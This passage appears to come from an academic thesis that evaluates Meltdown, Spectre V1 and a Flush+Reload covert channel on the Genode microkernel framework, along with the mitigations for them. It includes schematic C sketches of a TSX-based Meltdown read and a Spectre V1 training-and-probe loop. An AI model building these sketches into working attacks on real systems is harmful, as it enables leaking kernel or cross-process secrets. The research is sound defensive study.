An attacker can read some data and use this data to index into an array. The attacker can then use a covert cache channel to inspect which index in the array was accessed and thereby recover the initial data. The Meltdown attack is performed in this way: indexing an array with the value from an illegal memory access. On most kernels, this illegal access raises a segmentation fault, preventing the address from being read and triggering signal handling. However, if the CPU uses OOE, the array may be indexed with the data before the signal handling occurs [31]. Listing 2.4 shows an example of how the Meltdown attack may work. Here the data from the address 0x7ffffdf9d580 is saved to a variable with which the array data is indexed. If OOE is available, the access of data may occur before the signal handling and leave the data in the cache. For Meltdown to read a memory address, that address needs to be mapped into the address space of the user process, i.e., the user process needs to have access to virtual memory corresponding to the physical memory of the process under attack [31].

Listing 2.4: Meltdown Memory Access
// Illegal memory read
char ill = * (char*) 0x7ffffdf9d580;
// The PAGE_SIZE offset prevents the prefetcher from fetching adjacent data,
// i.e., it ensures that the exact value of ill can be identified with Flush+Reload
data[ill * PAGE_SIZE] = 0;

2.4.3 Proof-Of-Concept Implementation

Lipp et al. [31] created a Proof-Of-Concept (POC) implementation for Meltdown which can be found on Github4. The control flow of the attack is implemented as follows:

1. Flush the shared array from the cache.

2. Access shared memory array at an address calculated based on the value at the targeted address.

3. Recover from the triggered segmentation fault.

4. Test indices in the shared array for a cache hit.

4https://github.com/IAIK/meltdown


Several tools have been used to execute these steps. To flush the targeted address, the clflush instruction has been used [31]. Shared memory is used in the case of Flush+Reload, which is a well-performing side channel [48]. Recovering from the segmentation fault can be handled in Linux via the use of custom signal handlers, or more efficiently via the use of Intel TSX [31]. For the last step of testing values for cache hits, two methods are presented here: testing after each read, and testing all values after a single read. The latter is discussed in two versions: firstly, testing all values using a mixed-order iteration and, secondly, testing all values using a large offset. In addition, it is necessary to accurately determine to which cache level a memory access was made. To do this, a high-resolution timer like the TSC can be used [31]. Such timers are, however, not strictly necessary, as there are techniques to construct a high-resolution timer from lower-resolution ones [41]. An attacker targeting Genode and microkernels has some limitations related to the tools discussed above. Signal handling of certain signals, including segmentation faults, is not as flexible as needed on Genode [7]. Requiring the targeted data to be cached may be an unreasonable prerequisite. Intel TSX has been utilized in place of signal handling to recover from the segmentation fault; this method has proven the most effective [31], the reason being that there is hardware support for reverting a transaction. Thus, the OS cannot observe that a faulty access was made during the transaction [31].
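Putting the steps above together, the sketch below outlines one Meltdown round that uses Intel TSX to suppress the fault. It is a schematic illustration rather than the POC itself: probe_array and reload_and_find_hit() stand in for the shared array and the Flush+Reload probe, and a CPU with TSX support is assumed.

#include <stdint.h>
#include <immintrin.h>   /* _mm_clflush, _mm_mfence, _xbegin, _xend */

extern volatile uint8_t probe_array[256 * 4096];   /* assumed probe array */
extern int reload_and_find_hit(void);              /* assumed Flush+Reload step */

static int meltdown_read_byte(const volatile uint8_t *target)
{
    for (int i = 0; i < 256; i++)                          /* step 1: flush */
        _mm_clflush((const void *)&probe_array[i * 4096]);
    _mm_mfence();

    if (_xbegin() == _XBEGIN_STARTED) {    /* step 3: the fault only aborts   */
        uint8_t secret = *target;          /* step 2: illegal read ...        */
        (void)probe_array[secret * 4096];  /* ... leaves a trace in the cache */
        _xend();
    }
    return reload_and_find_hit();          /* step 4: probe for the cache hit */
}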

2.4.4 Mitigations

There have been efforts to mitigate both Meltdown and Spectre in software; consequently, there is a need to present which mitigations exist, how they work and how they are applied. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown by removing the kernel map from user space, which removes Meltdown's ability to access kernel memory [31]. KAISER has since been renamed to Kernel Page-Table Isolation (KPTI) and was introduced in version 4.15-rc4 of the Linux kernel5. Prout et al. [36] found that KPTI slowed down disk accesses by up to 50% due to the increased execution time of user-to-kernel transitions.

2.4.5 Meltdown on Genode

Genode's founder Feske6 has discussed the implications of Meltdown on Genode. Feske stated that due to the minimalistic responsibilities of the microkernel, there is not as much information to leak from the kernel. Furthermore, the only memory pages shared between user applications and the kernel are control blocks, which limits the information accessible through the shared LLC. Feske also suggested that the Meltdown attack should be tested on different kernels to get a complete picture of what information can be leaked. Genode's signal handling is not as adaptable as the one in Linux; an attacker cannot install a custom handler for segmentation faults [7]. Consequently, the attacker cannot recover from a segmentation fault in this way.

2.5 Spectre

Spectre is a class of microarchitectural attacks leveraging speculative execution on some modern processors [24]. Spectre attacks can be used to read memory from other user processes or the kernel. Kocher et al. [24] described four different attacks; in this thesis, we will focus on the attack exploiting conditional branches, Spectre Version 1 (Spectre V1).

5J. Corbet. The current state of kernel page-table isolation [LWN.net]. Dec. 2017. URL: https : / / lwn . net / Articles/741878/ (visited on 2019-01-23). 6N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).


2.5.1 Spectre V1 Attack Description

Spectre V1 exploits speculative execution to bypass conditional branches. To execute Spectre V1, an attacker first needs to find a vulnerable function in another process. One example of a vulnerable function can be seen in Listing 2.5. For this example to work, shared_array needs to point to memory shared by the attacker and the victim. This example function is vulnerable to an SCA which can allow an attacker to read private_array, but by using Spectre V1, an attacker can also read data outside private_array. By calling the function read_data many times with idx smaller than the size of private_array, an attacker can train the CPU to speculatively evaluate the condition on line 2 to true and, consequently, execute line 3. The speculative execution can be triggered if the variable size_of_private_array is not cached and, therefore, takes hundreds of CPU cycles to fetch. If the CPU after this speculative execution evaluates the condition on line 2 to false, line 3 is never committed. The speculative execution may still have left data in the cache, which may be read by the attacker using Flush+Reload or another cache-based SCA.

Listing 2.5: A function which is vulnerable to Spectre V1.
1 void read_data(unsigned int idx) {
2     if (idx < size_of_private_array)
3         dummy = shared_array[private_array[idx]];
4 }
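The attacker side of this scenario can be sketched as follows. The helper functions and the training constants are assumptions used for illustration only; they are not part of Listing 2.5 or of the thesis implementation.

#define TRAIN_ROUNDS 30                      /* assumed number of training calls */

extern void read_data(unsigned int idx);     /* the victim from Listing 2.5 */
extern void flush_size_variable(void);       /* assumed: evict size_of_private_array */
extern void flush_probe_array(void);         /* assumed: Flush+Reload flush step */
extern int  reload_and_find_hit(void);       /* assumed: Flush+Reload reload step */

static int spectre_v1_read_byte(unsigned int malicious_idx)
{
    for (int i = 0; i < TRAIN_ROUNDS; i++)   /* train the branch predictor */
        read_data(i % 8);                    /* in-bounds accesses only */

    flush_probe_array();
    flush_size_variable();                   /* make the bounds check slow */
    read_data(malicious_idx);                /* speculatively out of bounds */

    return reload_and_find_hit();            /* recover the leaked value */
}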

2.5.2 Spectre V1 Mitigations

Spectre V1 relies on speculative execution for its exploit; thus, a straightforward approach to mitigation would be to disable speculative execution. Disabling speculative execution may, however, degrade performance according to Kocher et al. [24]. Another strategy proposed by Kocher et al. is to apply a bitmask to the index, effectively forcing the index to be within the bounds of the array. Due to the data dependency this introduces, this method does not allow the array access to be out of bounds, even speculatively [19].

2.5.2.1 Preventing Speculative Execution

Intel recommends the use of the lfence instruction to prevent speculative execution, as it serializes instructions and has better performance than other serializing instructions [18]. Listing 2.6 shows how the lfence instruction can be applied to mitigate Spectre V1 in the vulnerable function.

Listing 2.6: A function which was vulnerable to Spectre V1 after the load fence mitigation has been applied.
void victim(size_t idx) {
    if (idx < array_size) {
        _mm_lfence();           // Guaranteed to be executed
        int foo = array[idx];   // after the condition is evaluated
        do_something(foo);
    }
}

Microsoft has added a feature to their MSVC compiler which allows the compiler to add a speculative code execution barrier, similar to lfence. This mitigation should have a negligible impact on performance according to Microsoft7.

7Microsoft. “/Qspectre”. In: (Oct. 2018). URL: https://docs.microsoft.com/en- us/cpp/build/ reference/qspectre?view=vs-2019 (visited on 2019-04-16).


2.5.2.2 Index Bitmasking

Stuart [43] showed a Spectre V1 mitigation which uses bit operations to remove the possibility of indexing outside the array. Listing 2.7 shows an example of a function which uses these bit operations to mitigate a Spectre V1 attack. Line 5 in the listing sets mask to a negative number if idx >= size. The OR with idx on line 5 prevents an attacker from defeating the check by choosing an idx so large that the subtraction wraps around to a positive value8. After the right shift on line 7, mask contains only 1s if idx >= size and only 0s otherwise. This depends on the right shift of a negative value being arithmetic, which is implementation-defined9 and thus depends on the compiler and architecture. Line 9 inverts mask to simplify the operation on line 11, where idx is AND:ed with either all 1s, if idx < size, or all 0s otherwise. Hence, the array cannot be indexed with a value greater than or equal to size.

Listing 2.7: A function which was vulnerable to Spectre V1 after the bitmask mitigation has been applied.
1  void victim(unsigned long idx) {
2      // unsigned long size
3      if (idx < size) {
4          // mask is negative if idx >= size, non-negative otherwise
5          long mask = idx | (size - 1 - idx);
6          // mask = 0xFFF... if mask was negative, else 0x000...
7          mask >>= (sizeof(long) * 8 - 1); // arithmetic right shift by (bits - 1)
8          // mask = 0x000... if it was 0xFFF..., else 0xFFF...
9          mask = ~(mask);
10         // idx & mask = idx if mask = 0xFFF..., else 0
11         int foo = array[idx & mask];
12     }
13 }

A mitigation similar to the one described in Listing 2.7 has been implemented in the Linux kernel10, see Listing 2.8. This mitigation uses two instructions to perform the bit masking. The first instruction, "cmp %1,%2", sets the carry flag if idx < size. The next instruction, "sbb %0,%0", sets mask either to -1, if the carry flag is set, or to 0 otherwise. Consequently, array_index_mask_nospec returns a mask of all ones if idx < size and 0 otherwise. AND:ing idx with the returned value gives idx if idx is in range and 0 otherwise.

8J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/ Articles/744287/ (visited on 2019-03-25). 9Arithmetic operators. URL: https://en.cppreference.com/w/c/language/operator_arithmetic (visited on 2019-03-25). 10D. Williams. x86: Implement array_index_mask_nospec. Jan. 2018. URL: https://git.kernel.org/pub/ scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859 (visited on 2019-03-26).


Listing 2.8: A function which was vulnerable to Spectre V1 after the built-in Linux kernel mitigation has been applied.
/* Source from
 * https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git
 * commit = babdde2698d482b6c0de1eab4f697cf5856c5859
 */
static inline unsigned long
array_index_mask_nospec(unsigned long idx, unsigned long size) {
    unsigned long mask;
    asm ("cmp %1,%2;" "sbb %0,%0;"
         : "=r" (mask) : "r" (size), "r" (idx)
         : "cc");
    return mask;
}

void victim(unsigned long idx) {
    // unsigned long size
    if (idx < size) {
        idx &= array_index_mask_nospec(idx, size);
        int foo = array[idx];
    }
}

2.6 Performance

In order to evaluate the performance impact of mitigations against Spectre on RPC, there is a need for a basic understanding of IPC performance and microkernel performance. In addition, we present criticism of microkernel performance in comparison with monolithic designs.

2.6.1 Microkernel Performance

Lameter [26] has looked at the performance of the monolithic Linux kernel compared to an abstract microkernel and discusses the microkernel's inability to scale with increasing numbers of processes.

2.6.2 IPC Performance

Immich et al. [17] performed their analysis by measuring the time it took for two processes to exchange messages over different IPC mechanisms; to get the current time, the function gettimeofday was used, since it provides microsecond accuracy. A similar study has been done for Sel4's IPC [49], which examined the overhead of allocating different IPC mechanisms as well as the execution time of using them.
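A minimal sketch of this style of measurement is shown below; exchange_message() is a placeholder for one IPC round trip and is not an API from the cited papers.

#include <sys/time.h>

extern void exchange_message(void);   /* placeholder: one IPC round trip */

/* Time one message exchange in microseconds using gettimeofday. */
static double time_round_trip_us(void)
{
    struct timeval start, end;
    gettimeofday(&start, NULL);
    exchange_message();
    gettimeofday(&end, NULL);
    return (end.tv_sec - start.tv_sec) * 1e6 +
           (end.tv_usec - start.tv_usec);
}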

2.7 Related Work

Genode is not the only approach to process separation and resource limitation; for a good understanding of the benefits and disadvantages of microkernels, the alternative solutions need to be understood. In addition, there is a body of work relating to Genode and security which is not relevant to microarchitectural attacks specifically but which does motivate an interest in investigating them.


2.7.1 Genode

Genode has seen work related to security. Constable et al. [5] worked on extending the formal Sel4 verification to a Virtual Machine Monitor (VMM) running on Genode. Lange et al. [28] used Genode and a microkernel to form a secure encapsulation of smartphone OSs. Waddington et al. [46] implemented a high-performance web cache using Genode+Fiasco.OC. Hamad and Prevelakis [13] measured IPsec performance on Genode running on Raspberry Pis. Several other works have focused on using Genode as a means to achieve a secure OS. Brito et al. [1] used Genode as a secure kernel base to process images securely in an ARM TrustZone cloud environment. Ribeiro et al. [38] used Genode to construct a Trustzone-backed database management system. Ramos [37] proposed the development of a toolkit, using Genode as a base, easing the development of Trustzone projects. Harp et al. [14] recommend a reference architecture, ISOSCELES, for medical devices building on Genode, using either Nova or Sel4 as a microkernel base. Hamad et al. [12] used Genode to implement a secure intra-vehicle communication framework, utilizing its IPC mechanisms for efficient message passing. Genode has seen little work related to microarchitectural attacks and side channels. Schmidt et al. [39] constructed a covert channel in Genode which exploited a software cache to construct a timing channel. However, to the best knowledge of the authors, there has been no other work relating to SCAs in Genode.

2.7.2 Side Channels

Xiao et al. [47] demonstrate a covert channel using the execution time of write accesses to shared memory pages. They leverage the Copy-On-Write (COW) technique, which is commonly used in shared memory implementations. COW copies the requested page and writes to the copy on demand, thus revealing whether a page is shared or not when the time of executing a write is measured [47]. Xiao et al. [47] also demonstrate, using this technique, examples of a covert channel transmitting 50-90 bps for practical applications. Pessl et al. [35] present a covert cross-CPU channel utilizing the varying access times of memory banks in DRAM. They demonstrated a channel with a capacity of 2.1 Mbps with an error probability of 1.8%, and a cross-VM channel with a capacity of 596 kbps with an error probability of 0.4%.

2.7.3 Microarchitectural Attacks

Mcilroy et al. [33] examined the deep-seated implications of how Spectre and incorrect hardware models affect confidentiality-enforcing programming languages. Mcilroy et al. showed that these confidentiality guarantees are completely compromised by Spectre. Koruyeh et al. [25] showed that the Return Stack Buffer (RSB) could be exploited instead of the BPU, thus introducing a class of SpectreRSB attacks. Koruyeh et al. were not successful in demonstrating these attacks on ARM and AMD CPUs. However, ARM and AMD CPUs also utilize an RSB and should therefore be vulnerable. There has also been work examining SCAs targeting ARM Trustzone. Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation used by the Keymaster trustlet. Another work, by Bukasa et al. [3], showed the ineffectiveness of Trustzone in preventing power-analysis SCAs. Microarchitectural attacks are also a quickly progressing field. A recent work by Schwarz et al. demonstrated the ZombieLoad attack, a new type of microarchitectural attack which exploits a fill buffer to read data from other processes [40]. This fill buffer is a type of load queue which is shared between hyper-threads. The buffer can under certain circumstances trigger a load which was initially issued on another core and can thereby leak data from loads issued by other processes [40].


2.7.4 Linux Control Groups

The Linux kernel implements limitation of resources in the form of control groups (cgroups). According to the man-page for cgroups:

"A cgroup is a collection of processes that are bound to a set of limits or parameters defined via the cgroup filesystem." [4]

Cgroups can restrict the use of resources like CPU and memory for processes in a cgroup. Cgroups may also provide guarantees of CPU time for processes in a group. However, unlike Genode, cgroups do not allow non-root processes in a cgroup to have children of their own [4].

2.7.5 Security by Virtualization

Using a small kernel is not the only way to potentially enhance the security of a system. Another feasible option is to use different virtual systems to separate processes. The virtual systems need to run on a hypervisor, which may itself be attacked. Thongthua and Ngamsuriyaroj [44] discuss some weaknesses they found in popular hypervisor software. However, the abstraction of virtualization does not prevent microarchitectural attacks such as Meltdown or Spectre [31, 24]. Irazoqui et al. [21] recovered an AES key in a cross-virtual-machine setup using an SCA that abused the LLC. The attack does not depend on the virtual machines running on the same core, since the LLC was used. Virtualization also adds overhead by handling multiple OSs running on the same hardware.

3 Method

This chapter begins by presenting how the tested system was set up, including how output was obtained, how the kernels were set up with Genode and how they were booted. Secondly, it presents the design of the covert Flush+Reload channel and the method used to measure it. Thirdly, the designs of the Meltdown and Spectre V1 attacks are presented. Lastly, the methodology for measuring the performance impact of the Spectre V1 mitigations is presented.

3.1 Setting up System Under Test

The System Under Test (SUT) is composed of Genode with a microkernel core, an attack implementation and an output channel. This setup was executed on an Intel Core i5-7500 CPU. We used Genode's build tools and documentation to build our implementation for each kernel 1. These build tools were available at Genode's Github page 2. To run a build, Genode requires an init-component which is assigned all system resources. Genode then delegates the task of assigning resources to this init-component. We built our implementation by assigning an initial resource budget to our process, thus enabling it to execute, use RPC and allocate memory. Figure 3.1 shows how the init process may start and delegate resources to two user processes. From our configuration, Genode's build tools create files which are used to boot the kernel with our implementation. These files can be used by Grub2 to multi-boot the tested SUT.

3.1.1 Using x86 Intrinsics

The contents of the file /genode-gcc/lib/gcc/x86_64-pc-elf/6.3.0/include/mm_malloc.h were removed due to a compiler error. This was needed to allow the use of the x86-intrinsics header, which provides intrinsics for the rdtsc and lfence instructions.

1 https://genode.org/documentation/developer-resources/index
2 https://github.com/genodelabs/genode/tree/18.11


Figure 3.1: Overview of Genode's Hierarchy (microkernel, Genode, init and two user processes communicating via RPC).

3.1.2 Obtaining Output
Serial communication was used between the system under test and another computer to obtain output from the attacking application, see Figure 3.2. This was done because Genode does not provide console output by default; instead, the default behavior of Genode is to forward all log events to the serial port. To configure the serial port, a modification of Bender was needed. Bender is a small kernel which is used to boot the host kernel. By default, on boot, Bender finds a serial port and saves the address of this port at a specific memory address [7]. After that, Bender boots the microkernel and Genode. Genode can then look at that address to know which serial port to forward all logs to.

Figure 3.2: The communication setup to retrieve output from the tested system: the test system is connected to the measuring system via serial communication.

Bender did not choose the correct serial port on the tested PC and was therefore modified to select the serial port in use. The Bender version used can be found at Alexander Boettcher's Github page3. We changed the file4 so that com0_port was set to 0x3f8, which is the address of the serial port on the test PC, as shown by running the command dmesg in Linux. The change made to Bender can be seen in Listings 3.1 and 3.2.

3 https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f
4 https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/standalone/bender.c


Listing 3.1: Genode's Default Bender
if (!serial_ctrl.cfg_address && !iobase &&
    serial_ports(get_bios_data_area()) && serial_fallback) {
  *com0_port = 0x3f8;
  *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);
}

Listing 3.2: Genode's Bender After Applied Changes
/* if (!serial_ctrl.cfg_address && !iobase &&
       serial_ports(get_bios_data_area()) && serial_fallback) { */
  *com0_port = 0x3f8;
  *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);
//}

3.1.3 Building and Running on Nova
Genode's build tool created the files hypervisor and image.elf.gz when an application was compiled for Genode+Nova. These files were located at /var/run/spectre/boot if an application named "spectre" was compiled. These files can be used in Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Nova by adding the menu entry shown in Listing 3.3, where <...> is the folder containing hypervisor and image.elf.gz.

Listing 3.3: Grub2 Menu Entry for Nova
1 menuentry 'Genode Spectre Nova' {
2   insmod multiboot2
3   insmod gzip
4   multiboot2 <...>/bender        # Path to modified bender binary.
5   module2 <...>/hypervisor hypervisor iommu nopid novga serial
6   module2 <...>/image.elf.gz image.elf
7 }

3.1.4 Building and Running on Okl4
Genode's build tool created the file image.elf when an application was compiled for Genode+Okl4. This file was located at /var/run/spectre/boot when an application named "spectre" was compiled. This file can be used with Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Okl4 by adding the menu entry shown in Listing 3.4, where <...> is the folder containing image.elf.


Listing 3.4: Grub2 Menu Entry for Okl4
1 menuentry 'Genode Spectre Okl4' {
2   insmod multiboot2
3   multiboot2 <...>/bender        # Path to modified bender binary.
4   module2 <...>/image.elf
5 }

Our application did not build on Okl4 using the default build file. We added -march=native to compile programs containing assembly instructions. The -march=native flag tells the compiler to tailor the generated instructions to the CPU in use5.

3.1.5 Building and Running on Linux
The output from the Genode application was forwarded from the terminal to the serial port. This was done to use the same measurement methodology as for the two other kernels.

3.1.6 Measuring Throughput
To measure the channel's or the attacks' throughput, a fixed string message m of length n was transmitted. Throughput T was then calculated as the number of correctly transmitted bytes per second (Bps). This definition of throughput has been used to measure other microarchitectural attacks [31, 25]. A byte in position i was considered correctly transmitted if the received byte r_i had the same value as the message byte m_i. The throughput T was calculated as

    T = \frac{\sum_{i=0}^{n} C(m_i, r_i)}{t_n}    (3.1)

where

    C(m, r) = \begin{cases} 1 & \text{if } r = m \\ 0 & \text{otherwise} \end{cases}

and t_n is the total execution time in seconds, T is the throughput of the channel and C(m, r) is the function determining equality of bytes.

An array of size 2048 bytes was used to measure throughput. Every leaked byte was forwarded via serial communication to the measuring system, see Figure 3.2. Each sent byte was then compared to the correct byte, see Equation (3.1). Genode's timer object was used on Nova and Linux to measure the total execution time t_n with millisecond accuracy. Some changes needed to be made to the Genode-application run file, where timer needs to be added to build and build_boot_image. The timer object was not used on Okl4; instead, a timer on the measuring system was used to measure t_n. On Okl4, a start-timer command was transmitted via the serial port before the first transmitted byte and an end-timer command after the last byte; the timer on the measuring system was started and stopped by these commands. The execution time t_n was transmitted after all bytes if Genode's timer object was used.
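Computed in code, Equation (3.1) amounts to counting matching bytes and dividing by the execution time. The following sketch uses illustrative names only and is not taken from the measured implementation.

#include <stddef.h>

/* Throughput per Equation (3.1): correctly transmitted bytes per second.
 * m is the transmitted message, r the received bytes, n their length and
 * t_n the total execution time in seconds. */
static double throughput_bps(const unsigned char *m, const unsigned char *r,
                             size_t n, double t_n)
{
    size_t correct = 0;
    for (size_t i = 0; i < n; ++i)
        correct += (r[i] == m[i]);   /* C(m_i, r_i) */
    return (double)correct / t_n;
}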

5Using the GNU Compiler Collection (GCC): x86 Options. URL: https://gcc.gnu.org/onlinedocs/gcc/ x86-Options.html (visited on 2019-03-25).


3.2 Implementing the Flush+Reload Channel

To answer Research Question 1, we will first demonstrate that Flush+Reload can be used to create a covert channel between two processes in Genode. To verify the result, we construct two conspiring processes which utilize Flush+Reload in order to communicate a message. Shared memory of size (256 + 2) * Padding was used for the Flush+Reload channel: 256 addresses, one per possible byte value, offset by a padding to prevent prefetching between values. Padding was also placed at the beginning and at the end of the array to prevent prefetching of shared memory addresses caused by accesses outside of the array. In Figure 3.3, this design is used to transmit a value by caching the corresponding address. The receiver, pictured in the figure, can then measure the access time to each address in the array and conclude which corresponding value was transmitted.

Figure 3.3: A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array.
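A minimal sketch of the transmit side of this channel is given below; the array name, the constants and the guard-slot handling are illustrative assumptions rather than the evaluated implementation.

#include <stddef.h>

#define PADDING  4096    /* internal padding between value slots            */
#define N_VALUES 256     /* one slot per possible byte value                */

/* Shared array of (256 + 2) * PADDING bytes: one guard slot before and one
 * after the value slots, preventing prefetching triggered from outside.   */
static volatile unsigned char channel[(N_VALUES + 2) * PADDING];

/* Transmit one byte by touching, and thereby caching, the address that
 * corresponds to its value. The receiver later times accesses to all slots
 * and reports the one that hits in the cache.                              */
static void transmit_byte(unsigned char value)
{
    (void)channel[((size_t)value + 1) * PADDING];   /* +1 skips the guard */
}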

3.2.1 Measuring Cache Hits
A threshold was used to decide whether a value was cached or not. This threshold was determined by profiling the time it took for the CPU to access cached and uncached values [48]. The L1 cache or the LLC was used depending on the attack design; therefore, two thresholds were defined, one for the L1 cache and one for the LLC. We assume a memory model of access times as shown in Figure 3.4, in which tLLC is the upper bound for accessing the LLC and tL1 is the upper bound for accessing the L1 cache. The thresholds tLLC and tL1 were chosen as the upper bound of the measurements for the LLC and the L1 cache respectively. This choice was made arbitrarily, with the intent of minimizing false positives while preserving true positives. The time to access a value was measured using the timing function described in Section 2.2.2. To profile uncached accesses, an array of size 4096 × (256 + 2) bytes was used, with an internal padding of 4096 bytes to prevent prefetching. The time to access uncached values was measured by first removing the array from the cache using clflush and then measuring the time to access each address. A similar method was used to measure the timings for the L1 cache, the difference being that the values were cached in the same process before timing the accesses. Two processes were used to measure the access times to the LLC: one process which cached the values and one process which timed the accesses, see Figure 3.5. If the two processes get scheduled on the same core, the values may be cached in either the L1 cache or the LLC.


Figure 3.4: A model of memory access times for different memory levels (L1, LLC and DRAM).

Figure 3.5: A sequence diagram for measurements of the LLC access times.
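A sketch of how such a threshold can be derived from the profiling samples of one cache level is shown below; the function and parameter names are ours and only illustrate the "upper bound of the measurements" rule described above.

#include <stddef.h>

/* Choose a cache-hit threshold as the maximum (upper bound) of the access
 * times measured for a given cache level, e.g. t_L1 from the L1-cached
 * samples and t_LLC from the LLC-cached samples.                          */
static unsigned long long choose_threshold(const unsigned long long *samples,
                                           size_t n)
{
    unsigned long long max = 0;
    for (size_t i = 0; i < n; ++i)
        if (samples[i] > max)
            max = samples[i];
    return max;
}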

3.2.2 Preventing Data Prefetching
The in-order loop in Listing 3.5 triggers the CPU to prefetch addresses before they are accessed, which results in false-positive cache hits for subsequent values. The example in Listing 3.6, on the other hand, flushes all possible values and then measures the access times out of order to prevent data prefetching.

Listing 3.5: Flush+Reload
1 for i in 0..255
2   clflush(address + i*Padding)   // Flush channel from cache
3 wait_for_read()                  // Wait for reloading process
4 for i in 0..255
5   time(address + i*Padding)      // Test value for cache hit

23 3.2. Implementing the Flush+Reload Channel

Listing 3.6: Flush+Mix
1 for i in 0..255
2   clflush(address + i*Padding)   // Flush channel from cache
3 wait_for_read()                  // Wait for reloading process
4 for i in 0..255
5   m = (i * a + b) % 256          // a and 256 relatively prime
6   t = time(leak + m*Padding)     // Test value for cache hit
7   if t < LLC_THRESHOLD
8     cache_hits += 1

The offset Padding is used as internal padding to prevent prefetching between values. 4 kB was chosen as the largest internal padding, as it is the page size on the tested system and the CPU does not prefetch across page boundaries [24, 10]. An example of the array used for the channel can be seen in Figure 3.6, where 4 kB internal padding is used.

Figure 3.6: Leak array layout: 256 value slots at 4 kB offsets, with guard padding at both ends of the array.

The SRGs were tested for how well they prevent prefetching, measured as no detected cache hits when looping over the array. The SRGs were chosen with modulus m = 256, where a and b in Listing 3.6 were chosen according to the scheme in Section 2.3.2. The SRGs were evaluated by iterating over an array 256 times using indices generated from the SRG. Each access time was measured and checked for a cache hit, as described in Section 3.2.1. The SRGs were further evaluated for the padding sizes 4096, 2048, 1024, 512, 256 and 128 bytes. The limits 4096 and 128 were used as they are the page size and cache-line size of the tested system; consequently, the CPU does not prefetch for padding sizes of 4096 bytes or more, and padding below 128 bytes does not guarantee separation between values. All SRGs with a ∈ [1, 255] and b = 0 were evaluated. The offset b = 0 was chosen since a constant offset should not affect prefetching and to limit the number of SRGs to evaluate. Two SRGs are presented: the one with the best performance, in Equation (3.2), and an arbitrarily chosen worse SRG, in Equation (3.3). The second is used to illustrate the characteristics of a poorly performing SRG.

    m_i = (49 i + 0) \bmod 256    (3.2)

    m_i = (33 i + 0) \bmod 256    (3.3)
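The SRGs above are affine index maps; the following sketch (with illustrative names) generates the resulting probe order, which visits every index exactly once as long as a is odd, i.e., relatively prime to 256.

/* Generate the probe order m_i = (a*i + b) mod 256 used to defeat the
 * prefetcher; a must be relatively prime to 256 for a full permutation. */
static void srg_order(unsigned a, unsigned b, unsigned char order[256])
{
    for (unsigned i = 0; i < 256; ++i)
        order[i] = (unsigned char)((a * i + b) % 256);
}

/* Example: the best-performing SRG of Equation (3.2), a = 49, b = 0. */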

3.2.3 Adapting the Channel to Targeted Kernels
Implementation of Flush+Reload required some adaptations depending on the intended target. One adaptation was that the rdtsc instruction was used instead of rdtscp, as the latter resulted in a crash on Nova. Thus, the recommended timer suggested by Paoloni [34] was used for Linux and Okl4, see Listing 2.2, while the alternative timer suggested by Paoloni was used for Nova, see Listing 2.3.

3.2.4 Measuring Throughput of the Covert Channel
The throughput for the covert Flush+Reload channel was measured for use between two processes, see Figure 3.7, and for use inside a single process. The throughput was measured as described in Section 3.1.6.

Figure 3.7: A sequence diagram of Flush+Reload communication between two processes.

The throughput for communicating internally with Flush+Reload was measured using a process which first cleared the leak array from the cache, then cached the current value and used lfence to wait for the transmitted byte to be cached. The process then continued iterating over all values in the leak array to check for an L1 cache hit. The throughput could thereafter be measured using the method described in Section 3.1.6.

3.2.5 Reducing Noise
To obtain a reliable Flush+Reload channel it may be necessary to take multiple measurements, as done by others [31, 25]. R measurements m_{ij} were taken for each value i with the purpose of increasing the accuracy. A cache-hit detection function f_c with a threshold t_c was used to build a histogram H of recorded cache hits, where each entry h_i is the count of detected cache hits for value i. The estimate \hat{v} of the transmitted value v was calculated as

    \hat{v} = \operatorname*{arg\,max}_{i \in \{0,\dots,255\}} h_i

where

    h_i = \sum_{j=0}^{R} f_c(m_{ij})

and

    f_c(x) = \begin{cases} 1 & \text{if } x < t_c \\ 0 & \text{otherwise.} \end{cases}

In addition, synchronization was needed to increase the probability of a successful transmission. Locking was used in order to synchronize the transmitter with the receiver.
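The estimation above amounts to a histogram vote over the R attempts. A compact sketch, with hypothetical names and the measurements laid out as a 256 × R array of access times, is:

#include <stddef.h>

/* Estimate the transmitted value: count a cache hit whenever the measured
 * access time is below the threshold t_c, then return the value with the
 * largest hit count (the arg max of h_i).                                 */
static int estimate_value(const unsigned long long *meas,  /* 256 * R times */
                          size_t R, unsigned long long t_c)
{
    size_t best = 0, best_hits = 0;
    for (size_t i = 0; i < 256; ++i) {
        size_t hits = 0;
        for (size_t j = 0; j < R; ++j)
            hits += (meas[i * R + j] < t_c);   /* f_c(m_ij) */
        if (hits > best_hits) { best_hits = hits; best = i; }
    }
    return (int)best;
}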


3.3 Implementing Meltdown

The methodology for Meltdown was based on the POC by Lipp et al. [31]. Specifically, Meltdown required methodologies for recovering from a segmentation fault, identifying a target address, obtaining an observable result via a Flush+Reload channel and synchronizing the transmitter with the receiver. Additionally, on the Linux kernel, there was a need to disable KPTI for the attack to work.

3.3.1 Recovering from Segmentation Fault
Since Genode does not provide support for segmentation-fault handlers [7], another method was needed. One possible method is to start a new child process for each read which leads to a segmentation fault [31]; this method allows transmitting a single byte with each started child. Another method is to use Intel TSX to suppress the fault [31]. Both methods were evaluated; Intel TSX was chosen due to a more straightforward attack design and fewer resource requirements.

Figure 3.8: A sequence diagram of Meltdown using Intel TSX and Flush+Reload.

If Intel TSX is used, no inter-process synchronization is needed. A process continues its execution even if non-accessible memory is accessed during a transaction. The attacker can therefore run Flush+Reload directly after the Meltdown access, see Figure 3.8.
